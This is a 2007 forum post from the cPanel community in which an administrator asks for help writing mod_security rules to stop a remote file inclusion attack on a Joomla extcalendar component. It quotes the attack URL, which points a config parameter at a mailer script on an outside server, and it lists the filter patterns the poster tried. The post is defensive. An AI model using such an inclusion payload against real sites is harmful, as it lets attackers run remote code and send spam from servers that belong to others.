Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

mod_security rules help - block external mailer script

Discussion in 'Security' started by jeroman8, Jun 19, 2007.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    Hello!

    I'm trying to block so the following command/address can't be run but whithout blocking
    to much som OK commands can be run.

    components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://bs-club.net/cache/Shaun$.txt?

    I mod security I have added this:

    SecFilterSelective THE_REQUEST "=http//"
    SecFilterSelective THE_REQUEST "d=http"
    SecFilterSelective THE_REQUEST "admin_events.php?CONFIG_EXT"
    SecFilterSelective THE_REQUEST "inc_dir=http"
    SecFilter "admin_events.php?CONFIG_EXT"
    SecFilter "d=http"
    SecFilter "inc_dir=http"

    The strange thing is if I add manually for example in address field:

    components/com_extcalendar/d=http

    //Then I get forbidden, mod_sec blocks it.
    But none of the above rules work when it's in the adress as above/top - something
    makes a difference in that url cause the page is viewable and you can send email.
    It's a mailer scripts being loaded from another server.

    Even if I chmod 000 the admin_events.php - I can load the page !!
    I guess it's because it's really not the file you're loading, it's the external file but
    hm... it should be forbidden anyway I think.

    But the rules - anyone know how to block it alright ?
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice